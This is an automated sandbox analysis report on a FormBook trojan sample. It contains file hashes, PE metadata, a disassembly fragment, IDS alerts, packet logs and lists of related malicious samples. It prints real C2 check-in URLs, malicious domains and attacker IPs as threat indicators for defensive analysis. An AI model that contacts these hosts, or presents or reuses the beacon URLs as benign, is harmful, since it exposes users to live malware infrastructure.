                                                            69.57.172.11
                                                            		bharatcrimecontrol24news.comUnited States
                                                            		25653FORTRESSITXUStrue
                                                            72.14.185.43
                                                            		www.topdeals.bizUnited States
                                                            		63949LINODE-APLinodeLLCUStrue

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1410996
                                                            Start date and time:2024-03-18 14:41:54 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 6s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:i5NDVAFg42.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/0@11/8
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 34
                                                            • Number of non-executed functions: 314
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: i5NDVAFg42.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            14:42:40API Interceptor7710614x Sleep call for process: explorer.exe modified
                                                            14:43:24API Interceptor7664165x Sleep call for process: ipconfig.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            35.214.118.179RFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.flavorfog.online/vr01/?vRfX=lhL0WFfxrF_LiLF&CZjpOVd=Qr63XqK/wr5UE6EBNOKG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2eMWaZbL/QM6
                                                            76.223.105.230http://sharepoints-hilcoglobal.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                            • sharepoints-hilcoglobal.com/
                                                            BBKK89788667 PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.4tvaccounting.com/he2a/?RR=fRvmnDQkUwBNmrpMgCP1wdvpMJpoKxoIifkD3nzVpvnHuw/vKX70bic3h2eGd/HuGDHk&2d=9rJtLh7
                                                            TTHSBC_Bank_280224_8845_PI.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.aicertifiedpro.com/fd05/
                                                            BBK9888767 PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.4tvaccounting.com/he2a/?x6jPbj2h=fRvmnDQkUwBNmrpMgCP1wdvpMJpoKxoIifkD3nzVpvnHuw/vKX70bic3h1qWY+nVezmj&CR=CrfXr4g
                                                            Repeat_Order_#020823.batGet hashmaliciousFormBook, DBatLoaderBrowse
                                                            • www.transmigrationholdings.com/fd05/
                                                            http://sharepoint-bmcprops.comGet hashmaliciousUnknownBrowse
                                                            • sharepoint-bmcprops.com/
                                                            rSKMBT_2092024PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.plannuary.com/o22d/?mtxh6=Y0GpDr7P&Yn=HT0JaE4JSVLlvyDsVaMcwLE1Cd3F7MrwKVDC2r1b0MSYZbm+F7r4uyPKLF3T5rDCHWR8A5miZQ==
                                                            luJ1ncVKe3.exeGet hashmaliciousFormBookBrowse
                                                            • www.pristinepressurecleansa.com/de74/?YBZD6=dwmJPSTHaFqyxJsP0k8KF7E28SLrYdMxFes8WmqMd1k67B4rRmUyOAAqX4TiaiHOYT9nxCek3w==&TVg8xb=yb9P8nIHBZD
                                                            IJa9T5MHGm.exeGet hashmaliciousFormBookBrowse
                                                            • www.globigprimecompanylimited.com/he09/?Jl9lJ=vjRQfHJxct2yqxCUeVzxR/OM7oj7gD8bN+tPgJMF+X+trRNTw1+QfW/9DwZg/M45bBkp&TTaxHz=zlL0Nvhx
                                                            hsfEMY1sZ2.exeGet hashmaliciousFormBookBrowse
                                                            • www.tenderherbschool.com/he09/?_DH4TP=pTMGdvGi3lnvKnobEiI8z0/UIEBSOssiu6EGDI67hJPgTftK/8as1TrRAZFP3ouTrR2B&et=YV88nLEhiPGDuR8p
                                                            34.149.87.45PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.poshplaybliss.com/hy07/?pFQP-nBH=uYP475ABRK1V1YxF/YUDBVoHb2FJMlZMWFDDJBe/dDX7nYgh8Yc9+WEOQwrtpz5/x5vbQhcZcQ==&CPp=gdoXZHeHF
                                                            RFQ- Titan Machinery SRL2024100044-11RO.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.formytinyhome.com/ag89/
                                                            RFQ- Titan Machinery SRL2024100044-11RO.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.formytinyhome.com/ag89/
                                                            FDSYK7kY3n.exeGet hashmaliciousFormBookBrowse
                                                            • www.kirtirefrigeration.com/vr01/?Jf=0FWlSxGTmUQimNBR32eEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZWydXdGbldeP&ojq0sr=PxoPdD
                                                            mRWU3uqJ2O.exeGet hashmaliciousFormBookBrowse
                                                            • www.ae-skinlab.com/pz08/?QrKPp0c=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxXEZE8QNoAl&Tp=HBipkFZhs6F0s
                                                            Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.dcmdot.com/he2a/?H2MHKx=2XoPmZC6QyeVdhyhPQr3V5bid1kU2Qptg9m+vAe6mu/QEKn+CtX8fbWbAyG1tUXxPQ20&tZR=NZ_hS
                                                            rDHLFacturaElec.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.ae-skinlab.com/pz08/?GtLpM=2oeA2CWBQawTKIkxVbFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDuZAouKaYl&lnnd=EVu0YJRp5P
                                                            nPDF23232.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.avadesanges.net/ge22/?DXFTJ=/fid6oNh7cPHX4kJHBnT7azmyt0m3G/qCAPeU71Ocedbs2USdwOgtLDoEbb9dt6Te6eX&Rlj=XPs0sRgpz
                                                            RFQ (VALMICRO BHD) 624AM - 202MY.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.formytinyhome.com/ag89/?ItTPXz=aG5u+ubDghyH2NSUNQtpVLUarsDPa9yIz3SpWKvbIMKxWetJqCPjLAnHoEusoptfwu6i+V0SjjnXA+pUK9t+ljGy6BVkeSntcPoCZkjJz+roSFxLLQ==&0x=LtC8
                                                            psv data sheet_jpeg.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.beachballfoam.com/g0dh/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            td-ccm-neg-87-45.wixdns.netPO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 34.149.87.45
                                                            RFQ- Titan Machinery SRL2024100044-11RO.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.149.87.45
                                                            RFQ- Titan Machinery SRL2024100044-11RO.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.149.87.45
                                                            FDSYK7kY3n.exeGet hashmaliciousFormBookBrowse
                                                            • 34.149.87.45
                                                            CtEeMS3H62.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                            • 34.149.87.45
                                                            BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                            • 34.149.87.45
                                                            mRWU3uqJ2O.exeGet hashmaliciousFormBookBrowse
                                                            • 34.149.87.45
                                                            Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 34.149.87.45
                                                            rDHLFacturaElec.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 34.149.87.45
                                                            nPDF23232.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 34.149.87.45
                                                            www.flavorfog.onlineRFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 35.214.118.179
                                                            www.topdeals.bizRFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 45.33.18.44
                                                            RFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 45.33.2.79

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            DMITUSVt5wr1Hj3H.elfGet hashmaliciousMiraiBrowse
                                                            • 154.17.176.198
                                                            pxNxgL8ZT7.exeGet hashmaliciousUnknownBrowse
                                                            • 45.88.195.188
                                                            New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                            • 154.17.26.8
                                                            SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                            • 154.17.26.8
                                                            doser.exeGet hashmaliciousUnknownBrowse
                                                            • 45.88.201.179
                                                            doser.exeGet hashmaliciousUnknownBrowse
                                                            • 45.88.201.179
                                                            kVLGs246N5.elfGet hashmaliciousUnknownBrowse
                                                            • 154.17.3.7
                                                            YxfCp0IpXu.exeGet hashmaliciousAurora, Amadey, RedLine, zgRATBrowse
                                                            • 154.17.165.178
                                                            c87befb155b77369e637bff57c434eef30a09844c49e8.exeGet hashmaliciousRedLineBrowse
                                                            • 154.17.165.178
                                                            uBeYmKegYl.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • 45.88.201.179
                                                            ATGS-MMD-ASUSTF2AD5Jnbu.elfGet hashmaliciousUnknownBrowse
                                                            • 51.193.160.203
                                                            yzIY5KFJSu.elfGet hashmaliciousMiraiBrowse
                                                            • 51.24.179.239
                                                            5dm0sjynSD.elfGet hashmaliciousUnknownBrowse
                                                            • 48.13.8.29
                                                            o7EitOEfWr.elfGet hashmaliciousUnknownBrowse
                                                            • 34.1.72.58
                                                            8B5NOWiWn8.elfGet hashmaliciousUnknownBrowse
                                                            • 57.237.12.109
                                                            bzVCvtoyIt.elfGet hashmaliciousMiraiBrowse
                                                            • 57.147.43.17
                                                            hyWl33Q2OI.elfGet hashmaliciousUnknownBrowse
                                                            • 57.27.2.186
                                                            7p4wRYn0OK.elfGet hashmaliciousMiraiBrowse
                                                            • 32.156.125.204
                                                            PD1Afd15RS.elfGet hashmaliciousMiraiBrowse
                                                            • 48.198.1.93
                                                            7yboxvX8mm.elfGet hashmaliciousUnknownBrowse
                                                            • 32.232.216.224
                                                            GOOGLE-2UShttps://cthompson-vsc16.coupacloud.com/quotes/external_responses/b30e6941a7e0553e0d3b5d318c8a406aefe85fa0bd4d5e844560a248434cc9ccd28fbee0140d9980/terms?response_intend=trueGet hashmaliciousUnknownBrowse
                                                            • 35.212.133.238
                                                            https://cthompson-vsc16.coupacloud.com/quotes/external_responses/b30e6941a7e0553e0d3b5d318c8a406aefe85fa0bd4d5e844560a248434cc9ccd28fbee0140d9980/terms?response_intend=trueGet hashmaliciousUnknownBrowse
                                                            • 35.211.178.172
                                                            uA97EyP1li.elfGet hashmaliciousMiraiBrowse
                                                            • 35.209.64.74
                                                            https://m-r.pw/ptviaverdeGet hashmaliciousUnknownBrowse
                                                            • 35.211.178.172
                                                            https://dfv.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                                                            • 35.207.24.140
                                                            http://marketplace-item-details-98756222.zya.meGet hashmaliciousHTMLPhisherBrowse
                                                            • 35.211.118.13
                                                            SAAwuY5V9b.elfGet hashmaliciousMiraiBrowse
                                                            • 35.209.64.93
                                                            https://gfjhg-102347.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                            • 35.211.178.172
                                                            https://gfjhg-102347.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                            • 35.211.178.172
                                                            https://www.fzhla.cn/Get hashmaliciousUnknownBrowse
                                                            • 35.211.178.172
                                                            AMAZON-02USTF2AD5Jnbu.elfGet hashmaliciousUnknownBrowse
                                                            • 54.176.136.51
                                                            yzIY5KFJSu.elfGet hashmaliciousMiraiBrowse
                                                            • 35.163.111.249
                                                            o7EitOEfWr.elfGet hashmaliciousUnknownBrowse
                                                            • 54.110.214.152
                                                            8B5NOWiWn8.elfGet hashmaliciousUnknownBrowse
                                                            • 52.79.116.181
                                                            hyWl33Q2OI.elfGet hashmaliciousUnknownBrowse
                                                            • 54.215.193.208
                                                            7InjeWQVHC.elfGet hashmaliciousUnknownBrowse
                                                            • 13.62.27.211
                                                            PD1Afd15RS.elfGet hashmaliciousMiraiBrowse
                                                            • 34.208.242.223
                                                            FoDoFx0t5a.elfGet hashmaliciousMiraiBrowse
                                                            • 13.114.216.30
                                                            xFe4GHvmqU.elfGet hashmaliciousUnknownBrowse
                                                            • 54.118.15.109
                                                            QEMy2mlwhJ.elfGet hashmaliciousMiraiBrowse
                                                            • 54.183.198.10

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.394530119709165
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.98%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            File name:i5NDVAFg42.exe
                                                            File size:185'856 bytes
                                                            MD5:728b83244a275ef0e29cb00aa0c6692c
                                                            SHA1:8f744b5564e78ab054bc685bd12483c1ffd9de4d
                                                            SHA256:d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0
                                                            SHA512:dfee5c83bd2973362875bee76c688b81f191927a0e21eb104791577d79de110ea9912b4c35e65a46808309c02c1be6c1c181699491edcd19517901d53d0c4da5
                                                            SSDEEP:3072:CtzMC+k7U9fY/0/13Uay9AGYKolYE6upZ44YW5Q/T74PMu57c:o4HZU96RKolYLKm4oYPJ
                                                            TLSH:EF04AF36D642C071E2B212B5F6BD1B7B483D0E353295A0AAA3E215E06EE05E5F53D31F
                                                            File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L...%.0:............................ ......................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x2ff120
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x2e0000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x3A30A325 [Fri Dec 8 09:00:21 2000 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:

                                                            Entrypoint Preview

                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 64h
                                                            call 00007F13D87C24CAh
                                                            mov esp, ebp
                                                            pop ebp
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            call 00007F13D87C2513h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            jmp 00007F13D87C2576h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EE4h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EE7h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EEAh
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EEDh
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF0h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF3h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF6h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF9h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret

                                                            Rich Headers

                                                            Programming Language:
                                                            • [C++] VS2010 SP1 build 40219
                                                            • [ASM] VS2010 SP1 build 40219
                                                            • [LNK] VS2010 SP1 build 40219

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x2d1840x2d200de45bd1c65c4bdb8de03d2a9930238c0False0.7623950398199446data7.410197142919947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            03/18/24-14:45:01.182529TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.535.214.118.179
                                                            03/18/24-14:43:58.800885TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.576.223.105.230
                                                            03/18/24-14:45:21.823978TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.569.57.172.11
                                                            03/18/24-14:45:42.018352TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.534.149.87.45
                                                            03/18/24-14:43:40.128238TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.545.88.201.15
                                                            03/18/24-14:44:20.094348TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5104.16.36.105
                                                            03/18/24-14:46:45.274276TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.53.33.130.190
                                                            03/18/24-14:46:05.770153TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.572.14.185.43

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 18, 2024 14:43:39.998963118 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.125643015 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.128146887 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.128237963 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.255084038 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446310043 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446384907 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446444035 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446511984 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.446533918 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446578979 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.446665049 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446746111 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446820974 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.446825027 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446877956 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446913958 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.446922064 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.446995974 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.447037935 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573178053 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573190928 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573220968 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573271990 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573285103 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573334932 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573339939 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573348999 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573363066 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573375940 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573379993 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573419094 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573430061 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573457956 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573461056 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573482037 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573503017 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573523998 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573558092 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573580027 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573591948 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573601007 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573618889 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573638916 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573673964 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573718071 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.573741913 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573756933 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.573790073 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.625679016 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700059891 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700083971 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700097084 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700140953 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700185061 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700200081 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700242043 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700261116 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700275898 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700278044 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700299978 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700316906 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700321913 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700344086 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700354099 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700376987 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700381041 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700407028 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700427055 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700452089 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700455904 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700470924 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.700493097 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.700511932 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:40.752383947 CET804971245.88.201.15192.168.2.5
                                                            Mar 18, 2024 14:43:40.752485037 CET4971280192.168.2.545.88.201.15
                                                            Mar 18, 2024 14:43:58.708167076 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.800578117 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:43:58.800678015 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.800884962 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.888287067 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:43:58.908835888 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:43:58.908967018 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.908971071 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:43:58.909022093 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.914639950 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:43:58.914809942 CET4971380192.168.2.576.223.105.230
                                                            Mar 18, 2024 14:43:58.996511936 CET804971376.223.105.230192.168.2.5
                                                            Mar 18, 2024 14:44:19.786168098 CET4971580192.168.2.5104.16.36.105
                                                            Mar 18, 2024 14:44:19.874710083 CET8049715104.16.36.105192.168.2.5
                                                            Mar 18, 2024 14:44:19.874867916 CET4971580192.168.2.5104.16.36.105
                                                            Mar 18, 2024 14:44:20.094347954 CET4971580192.168.2.5104.16.36.105
                                                            Mar 18, 2024 14:44:20.183804035 CET8049715104.16.36.105192.168.2.5
                                                            Mar 18, 2024 14:44:20.196521997 CET8049715104.16.36.105192.168.2.5
                                                            Mar 18, 2024 14:44:20.196965933 CET8049715104.16.36.105192.168.2.5
                                                            Mar 18, 2024 14:44:20.197046041 CET4971580192.168.2.5104.16.36.105
                                                            Mar 18, 2024 14:44:20.268959045 CET4971580192.168.2.5104.16.36.105
                                                            Mar 18, 2024 14:44:20.357286930 CET8049715104.16.36.105192.168.2.5
                                                            Mar 18, 2024 14:45:01.018414021 CET4971680192.168.2.535.214.118.179
                                                            Mar 18, 2024 14:45:01.182116985 CET804971635.214.118.179192.168.2.5
